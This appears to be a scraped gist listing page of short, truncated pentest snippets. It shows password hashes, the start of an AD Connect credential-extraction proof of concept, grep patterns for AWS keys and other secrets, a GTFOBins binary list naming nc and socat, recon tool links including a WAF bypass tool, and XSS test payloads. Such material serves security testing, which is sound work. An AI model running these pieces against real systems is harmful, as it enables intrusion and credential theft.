This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
6e136e9da8372bc94899ecef857c540567 | |
$1$4UzUg9Tg$yg8DPUJhAhMRxaE6SM6Yl. | |
!@#$%^&*()1234457890!@#$%^&*()7890 | |
dragos3443gff@665$G455454dragos2sd | |
$1$rGEspa1r$4XhhKTz4LC7UBgKgp3WWw | |
rooooooooooooooooooooooooooooooot | |
%!SOJIE>COMFW%$#@!QWERTGFDSAZXCVB | |
UIYORYIPRTEWFDJDHGKJRRTEWEGSDFHFS | |
$1$EdkQIoSn$T3gzKLxlcxF7tsTCFqC8M | |
cappothebossradiopasiuniisthebest |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Write-Host “AD Connect Sync Credential Extract POC (@_xpn_)`n” | |
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(local);Database=ADSync;Integrated Security=sspi" | |
$client.Open() | |
$cmd = $client.CreateCommand() | |
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" | |
$reader = $cmd.ExecuteReader() | |
$reader.Read() | Out-Null | |
$key_id = $reader.GetInt32(0) | |
$instance_id = $reader.GetGuid(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
#coding: utf-8 | |
from spyse import spyse | |
import json | |
from pprint import pprint | |
#gere sua api-key em https://spyse.com/ | |
API_KEY = '' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
aqua=$(tput setaf 14); | |
PS3='Please enter your choice: ' | |
options=(${aqua}"aws-keys" "base64" "cors" "debug-pages" "firebase" "fw" "go-functions" "http-auth" "ip" "json-sec" "meg-headers" "php-curl" "php-errors" "php-serialized" "php-sinks" "php-sources" "s3-buckets" "sec" "servers" "strings" "takeovers" "upload-fields" "urls" "Clickjacking" "quit") | |
select opt in "${options[@]}" | |
do | |
case $opt in | |
"aws-keys") | |
grep --color=auto -HanrE "([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Reconhecimento de subdominios: | |
https://gist.github.com/Czerwinsk/57b3652b551590b346a548772686d18f | |
Checagem de dominios sobre HTTP ou HTTPS: | |
https://github.com/tomnomnom/httprobe | |
Checagem em achive, buscando por versoes antigas dos dominios: | |
https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 | |
Minha ferramenta para checagem dos outputs via grep, buscando padroes e parametros: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Virtual hosts search: | |
https://pentest-tools.com/information-gathering/find-virtual-hosts | |
Descobertas de virtual hosts | |
https://github.com/jobertabma/virtual-host-discovery | |
bruteforce virtual hosts: | |
https://github.com/gwen001/vhost-brute | |
Cloudflare WAF bypass tool 1: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Censys: | |
https://censys.io/ | |
Shodan: | |
https://www.shodan.io/ | |
Greynoise: | |
https://greynoise.io/ | |
zoomeye: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#Enumerando informações locais de um alvo linux | |
# useful binaries (thanks to https://gtfobins.github.io/) | |
binarylist='aria2c\|arp\|ash\|awk\|base64\|bash\|busybox\|cat\|chmod\|chown\|cp\|csh\|curl\|cut\|dash\|date\|dd\|diff\|dmsetup\|docker\|ed\|emacs\|env\|expand\|expect\|file\|find\|flock\|fmt\|fold\|ftp\|gawk\|gdb\|gimp\|git\|grep\|head\|ht\|iftop\|ionice\|ip$\|irb\|jjs\|jq\|jrunscript\|ksh\|ld.so\|ldconfig\|less\|logsave\|lua\|make\|man\|mawk\|more\|mv\|mysql\|nano\|nawk\|nc\|netcat\|nice\|nl\|nmap\|node\|od\|openssl\|perl\|pg\|php\|pic\|pico\|python\|readelf\|rlwrap\|rpm\|rpmquery\|rsync\|ruby\|run-parts\|rvim\|scp\|script\|sed\|setarch\|sftp\|sh\|shuf\|socat\|sort\|sqlite3\|ssh$\|start-stop-daemon\|stdbuf\|strace\|systemctl\|tail\|tar\|taskset\|tclsh\|tee\|telnet\|tftp\|time\|timeout\|ul\|unexpand\|uniq\|unshare\|vi\|vim\|watch\|wget\|wish\|xargs\|xxd\|zip\|zsh' | |
system_info() | |
{ | |
echo -e "Informações do sistema" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(1); |
OlderNewer